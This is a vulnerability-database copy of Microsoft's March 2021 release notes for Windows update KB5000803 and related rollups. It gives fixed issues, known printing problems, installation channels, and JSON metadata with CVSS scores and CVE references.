March 9, 2021—KB5000803 (OS Build 14393.4283)

2021-03-09T08:00:00

Description

None **NEW 3/9/21** **IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft’s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>). **11/19/20** For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1607 update history home page. ## Highlights * Updates security for the Windows user interface. * Updates to improve security when Windows performs basic operations. * Updates to improve security when using Microsoft Office products. ## Improvements and fixes This security update includes quality improvements. Key changes include: * Turns off token binding by default in Windows Internet (WinINet). * Addresses an issue in the Windows Management Instrumentation (WMI) service that causes a heap leak each time security settings are applied to WMI namespace permissions. * Addresses an issue in which a principal in a trusted MIT realm fails to obtain a Kerberos service ticket from Active Directory domain controllers (DC). This occurs on devices that installed Windows Updates that contain CVE-2020-17049 protections and configured PerfromTicketSignature to 1 or higher. These updates were released between November 10, 2020 and December 8, 2020. Ticket acquisition also fails with the error, “KRB_GENERIC_ERROR”, if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the USER_NO_AUTH_DATA_REQUIRED flag. * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to “FILE:” ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online. * Addresses a reliability issue in Remote Desktop. * Addresses an issue that might cause stop error 7E in **nfssvr.sys** on servers running the Network File System (NFS) service. * Addresses an issue that excessively logs DfsSvc Event 14554 in the System event log by default once every hour for each DFS Namespace (DFSN). This update adds a new registry key, RootShareAcquireSuccessEvent, to enable or disable Event 14554.Keypath: HKEY_LOCAL_MACHINE/L"System\CurrentControlSet\Services\Dfs\Parameters"Default value = 0If RootShareAcquireSuccessEvent is not 0 or is not present = Enable log.If RootShareAcquireSuccessEvent is 0 = Disable log.Whenever you change RootShareAcquireSuccessEvent, you must restart the DFSN service. * Addresses an issue that causes an increase in network traffic during update detection for Windows Updates. This issue occurs on devices that are configured to use an authenticated user proxy as the fallback method if update detection with a system proxy fails or there is no proxy. * Security updates to the Windows Shell, Windows User Account Control (UAC), Windows Fundamentals, Windows Core Networking, Windows Hybrid Cloud Networking, Windows Kernel, Windows Virtualization, the Microsoft Graphics Component, Internet Explorer, Microsoft Edge Legacy, and Windows Media. If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website. **Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions. ## Known issues in this update **Symptom**| **Workaround** ---|--- After installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include: * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos. * Table lines might be missing. Other alignment or formatting issues might also be present. * Printing from some apps or to some printers might result in a blank page or label. | This issue is resolved in KB5001633. ## How to get this update **Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001078) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** ---|---|--- Windows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. Microsoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000803>) website. Windows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates **File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000803](<https://download.microsoft.com/download/7/5/6/756f589c-b505-4341-b064-3f5e93f08aee/5000803.csv>).

{"id": "KB5000803", "vendorId": null, "type": "mskb", "bulletinFamily": "microsoft", "title": "March 9, 2021\u2014KB5000803 (OS Build 14393.4283)", "description": "None\n**NEW 3/9/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\n * Updates security for the Windows user interface.\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using Microsoft Office products.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Turns off token binding by default in Windows Internet (WinINet).\n * Addresses an issue in the Windows Management Instrumentation (WMI) service that causes a heap leak each time security settings are applied to WMI namespace permissions.\n * Addresses an issue in which a principal in a trusted MIT realm fails to obtain a Kerberos service ticket from Active Directory domain controllers (DC). This occurs on devices that installed Windows Updates that contain CVE-2020-17049 protections and configured PerfromTicketSignature to 1 or higher. These updates were released between November 10, 2020 and December 8, 2020. Ticket acquisition also fails with the error, \u201cKRB_GENERIC_ERROR\u201d, if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the USER_NO_AUTH_DATA_REQUIRED flag.\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online. \n * Addresses a reliability issue in Remote Desktop.\n * Addresses an issue that might cause stop error 7E in **nfssvr.sys** on servers running the Network File System (NFS) service.\n * Addresses an issue that excessively logs DfsSvc Event 14554 in the System event log by default once every hour for each DFS Namespace (DFSN). This update adds a new registry key, RootShareAcquireSuccessEvent, to enable or disable Event 14554.Keypath: HKEY_LOCAL_MACHINE/L\"System\\CurrentControlSet\\Services\\Dfs\\Parameters\"Default value = 0If RootShareAcquireSuccessEvent is not 0 or is not present = Enable log.If RootShareAcquireSuccessEvent is 0 = Disable log.Whenever you change RootShareAcquireSuccessEvent, you must restart the DFSN service.\n * Addresses an issue that causes an increase in network traffic during update detection for Windows Updates. This issue occurs on devices that are configured to use an authenticated user proxy as the fallback method if update detection with a system proxy fails or there is no proxy.\n * Security updates to the Windows Shell, Windows User Account Control (UAC), Windows Fundamentals, Windows Core Networking, Windows Hybrid Cloud Networking, Windows Kernel, Windows Virtualization, the Microsoft Graphics Component, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001633. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001078) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000803>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000803](<https://download.microsoft.com/download/7/5/6/756f589c-b505-4341-b064-3f5e93f08aee/5000803.csv>). \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.0}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/5000803", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-17049", "CVE-2021-1640", "CVE-2021-26411"], "immutableFields": [], "lastseen": "2022-08-10T14:07:17", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "AKB:D354FE9E-B72A-4328-93DD-28578E160D9B"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0108"]}, {"type": "cve", "idList": ["CVE-2020-17049", "CVE-2021-1640", "CVE-2021-26411", "CVE-2021-26878"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "kaspersky", "idList": ["KLA12003", "KLA12004", "KLA12108", "KLA12111", "KLA12112"]}, {"type": "krebs", "idList": ["KREBS:83CB7FE17AB0EB62BC1947A917C7546C"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:232C556149FB9AC828C416ADCCF93766"]}, {"type": "mscve", "idList": ["MS:CVE-2020-17049", "MS:CVE-2021-1640", "MS:CVE-2021-26411", "MS:CVE-2021-26878"]}, {"type": "mskb", "idList": ["KB4586781", "KB4586786", "KB4586793", "KB4586808", "KB4586823", "KB4586830", "KB4586834", "KB4586845", "KB4598243", "KB4598278", "KB4598279", "KB4598285", "KB4598288", "KB5000800", "KB5000802", "KB5000807", "KB5000808", "KB5000809", "KB5000822", "KB5000840", "KB5000841", "KB5000844", "KB5000847", "KB5000848", "KB5000851", "KB5000853", "KB5000856", "KB5001330", "KB5001337", "KB5001342", "KB5001347", "KB5004237", "KB5004238", "KB5004244", "KB5004285", "KB5004289", "KB5004294", "KB5004298", "KB5004299", "KB5004302", "KB5004305", "KB5004307", "KB5014677"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_NOV_4586793.NASL", "SMB_NT_MS20_NOV_4586830.NASL", "SMB_NT_MS20_NOV_4586834.NASL", "SMB_NT_MS20_NOV_4586845.NASL", "SMB_NT_MS21_MAR_5000802.NASL", "SMB_NT_MS21_MAR_5000803.NASL", "SMB_NT_MS21_MAR_5000807.NASL", "SMB_NT_MS21_MAR_5000808.NASL", "SMB_NT_MS21_MAR_5000809.NASL", "SMB_NT_MS21_MAR_5000822.NASL", "SMB_NT_MS21_MAR_5000841.NASL", "SMB_NT_MS21_MAR_5000844.NASL", "SMB_NT_MS21_MAR_5000847.NASL", "SMB_NT_MS21_MAR_5000848.NASL", "SMB_NT_MS21_MAR_INTERNET_EXPLORER.NASL", "SMB_NT_MS21_MAY_INTERNET_EXPLORER.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:B847D61CCF30D86B3C35C9E4CA764114", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-17049"]}, {"type": "securelist", "idList": ["SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:3647-1"]}, {"type": "thn", "idList": ["THN:4225CEE6D7775276254C20B6E19126AE", "THN:BC8A83422D35DB5610358702FCB4D154", "THN:BE0D8117CAD7D5DE97C405935DA09BC3", "THN:DE791A2DD37FD88B59147561CF1F7BBF", "THN:FA6A50184463DFCD20073D5EDD0F36F2"]}, {"type": "threatpost", "idList": ["THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:62A15BEBBD95FBF8704B78058BF030F1", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6"]}, {"type": "zdi", "idList": ["ZDI-21-493"]}]}, "score": {"value": -0.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "AKB:D354FE9E-B72A-4328-93DD-28578E160D9B"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0108"]}, {"type": "cve", "idList": ["CVE-2020-17049", "CVE-2021-1640", "CVE-2021-26411"]}, {"type": "githubexploit", "idList": ["C52C407D-E664-5756-BF78-38973532667A"]}, {"type": "kaspersky", "idList": ["KLA12004"]}, {"type": "krebs", "idList": ["KREBS:83CB7FE17AB0EB62BC1947A917C7546C"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:232C556149FB9AC828C416ADCCF93766"]}, {"type": "mscve", "idList": ["MS:CVE-2020-17049", "MS:CVE-2021-1640", "MS:CVE-2021-26411"]}, {"type": "mskb", "idList": ["KB4586793", "KB4586830", "KB4598279", "KB5000800", "KB5000809", "KB5001330"]}, {"type": "nessus", "idList": ["MICROSOFT_OFFICE_UNSUPPORTED.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B847D61CCF30D86B3C35C9E4CA764114", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-17049"]}, {"type": "securelist", "idList": ["SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:3647-1"]}, {"type": "thn", "idList": ["THN:BC8A83422D35DB5610358702FCB4D154", "THN:BE0D8117CAD7D5DE97C405935DA09BC3"]}, {"type": "threatpost", "idList": ["THREATPOST:056C552B840B2C102A6A75A2087CA8A5"]}, {"type": "zdi", "idList": ["ZDI-21-493"]}]}, "exploitation": null, "vulnersScore": -0.0}, "_state": {"dependencies": 1660144098, "score": 1660144387}, "_internal": {"score_hash": "7e216e7c77cda72994dc2ee52fc4fafb"}, "kb": "KB5000803", "msrc": "", "mscve": "CVE-2021-26411", "msplatform": "Windows Server 2016", "msfamily": "Browser", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB4507460", "KB4571694", "KB4103723", "KB3206632", "KB4525236", "KB4561616", "KB4556813", "KB4494440", "KB4512517", "KB4457131", "KB4540670", "KB4534271", "KB4580346", "KB4462917", "KB4530689", "KB4093119", "KB4074590", "KB4025339", "KB4487026", "KB4480961", "KB4598243", "KB4015217", "KB4593226", "KB4493470", "KB4483229", "KB4284880", "KB4338814", "KB4565511", "KB4013429", "KB3213986", "KB4343887", "KB4516044", "KB4471321", "KB4503267", "KB4019472", "KB4524152", "KB4489882", "KB4519998", "KB4537764", "KB4053579", "KB4034658", "KB4056890", "KB4088787", "KB4577015", "KB4022715", "KB4586830", "KB4467691", "KB4038782", "KB4041691", "KB4601318", "KB4550929", "KB4048953"], "parentseeds": ["KB5005043", "KB5012653", "KB5010359", "KB5015808", "KB5006675", "KB5012596", "KB5005569", "KB5007192", "KB5014710", "KB5001347", "KB5008230", "KB5003638", "KB5004948", "KB5004950", "KB5004249", "KB5013952", "KB5009546", "KB5009585", "KB5004238", "KB5015832", "KB5016622", "KB5010358", "KB5005573", "KB5014702", "KB5013963", "KB5006669", "KB5011495", "KB5008207", "KB5003197", "KB5016639", "KB5005040", "KB5011491", "KB5007207"], "msproducts": ["10486", "10852", "10816", "10855", "10853", "10724"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}

{"mskb": [{"lastseen": "2022-08-10T14:07:42", "description": "None\n**Important: ** \n \nWindows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n**Important: ****March 9, 2021** \nAs part of the end of support for Adobe Flash, [KB4577586](<https://support.microsoft.com/help/4577586>) is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586[ ](<https://support.microsoft.com/help/4577586>). For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4601384](<https://support.microsoft.com/help/4601384>) (released February 9, 2021) and addresses the following issues:\n\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerfromTicketSignature** to **1** or larger. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to Windows Fundamentals, Windows Shell, Windows UAC, Windows Hybrid Cloud Networking, Windows Media, and Windows Graphics.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001640. \n \n## How to get this update\n\n### Before installing this update\n\nWe strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566425](<https://support.microsoft.com/help/4566425>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000848>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for update 5000848](<https://download.microsoft.com/download/0/0/3/0036604e-4a48-4a7e-a819-1a9c3657f829/5000848.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000848 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000848", "href": "https://support.microsoft.com/en-us/help/5000848", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:07:40", "description": "None\n**Important: **Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n\n**Important: **For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4601360](<https://support.microsoft.com/help/4601360>) (released February 9, 2021) and addresses the following issues: \n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerfromTicketSignature** to **1** or larger. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Security updates to Windows Fundamentals, Windows Shell, and Windows Hybrid Cloud Networking.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001642. \n \n## How to get this update\n\n### Before installing this update\n\n**IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n\n### **Prerequisite**\n\nYou must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update 